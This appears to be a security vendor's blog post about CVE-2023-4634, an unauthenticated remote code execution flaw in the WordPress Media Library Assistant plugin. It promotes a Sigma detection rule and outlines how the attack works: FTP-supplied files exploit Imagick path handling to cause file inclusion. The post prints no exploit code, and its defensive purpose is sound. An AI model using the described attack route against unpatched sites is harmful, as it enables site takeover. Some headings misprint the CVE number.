CVE-2023-4634 Detection: Unauthenticated RCE Vulnerability in WordPress Media Library Assistant Plugin

Security researchers have issued a stark warning about a critical vulnerability, designated as CVE-2023-4634, which is affecting an alarming number of over 70,000 WordPress sites globally. This vulnerability originates from a security flaw in the WordPress Media Library Assistant Plugin, an extremely popular and widely used plugin within the WordPress community. With this vulnerability already being exploited in the wild and the ready availability of a proof-of-concept exploit, the risk of attacks intensifying and spreading further throughout the WordPress ecosystem becomes even more concerning. 

Detect CVE-2023-463 Exploitation Attempts

Proactive detection of vulnerability exploitation remains one of the top security use cases due to the ever-increasing number of CVEs impacting popular software, which poses severe challenges to organizations leveraging these products and requires attention from defenders. The newly discovered WordPress security bug tracked as CVE-2023-4634 is getting into the limelight with the PoC exploit publicly available on GitHub. SOC Prime provides defenders with the fastest feed of security news and empowers progressive organizations with the latest detection content to timely identify any traces of attack. 

To help security teams proactively detect CVE-2023-4634 exploitation attempts, SOC Prime Platform has recently released a novel Sigma rule in response to the escalating threats affecting  WordPress users. Follow the link below to reach the dedicated Sigma rule written by our keen Threat Bounty developer Mustafa Gurkan KARAKAYA:

Potential Unauthenticated Remote Code Execution [CVE-2023-4634] Vulnerability Exploitation Attempt on WordPress Media Library Assistant (via webserver)

This Sigma rule detects possible unauthenticated RCE exploitation on WordPress Media Library Assistant by sending a malicious payload. The detection code can be instantly convertible to 18 SIEM, EDR, XDR, and Data Lake technologies and is aligned with the MITRE ATT&CK®  framework addressing the Initial Access tactic and the Exploit Public-Facing Application technique (T1190) from its arsenal. 

Aspiring Detection Engineers can sharpen their Sigma and ATT&CK skills by joining the crowdsourced Threat Bouny Program. Train your detection coding skills to advance in an engineering career while enriching collective industry expertise and earning financial rewards for your input. 

To browse the entire collection of Sigma rules for CVE detection and dive into relevant threat intelligence, click the Exoplore Detections button below.

Explore Detections

CVE-2023-463 Analysis

Given WordPress’s widespread popularity as a content management system (CMS), with millions of websites relying on it worldwide, vulnerabilities like those in the Media Library Assistant Plugin pose a significant risk to organizations worldwide. Attackers might use compromised WordPress websites as an entry point to the organizational network proceeding with other malicious activities or use the affected site as a launching pad for malware distribution and phishing attacks.

The vulnerability in the limelight is an unauthenticated remote code execution (RCE) issue stemming from insufficient controls on file paths occurring during image processing via Imagick. It enables adversaries to supply files via FTP, leading to local file inclusion and remote code execution. Under these conditions, an attacker could potentially take over any unpatched WordPress site. 

The vulnerability affects Media Library Assitant plugin versions prior to 3.10 and requires a server with Imagick libraries installed to be exploited. For a successful attack, Imagick should rely on default configurations. Website administrators are urged to install the security patch from the WordPress dashboard as soon as possible. 

The issue has been discovered by security experts from Patrowl, who already released a writeup describing the security glitch along with PoC to provide an understanding of risk levels. 

With the growing volumes of CVEs actively exploited in the wild, proactive detection of exploitation attempts is critical for organizations striving to boost their cyber resilience. SOC Prime equips security teams with Uncoder AI, a single IDE for Detection Engineering enabling them to write flawless detection code with less effort and automatically translate it to 64 query languages — using an all-in-one product that ensures complete privacy.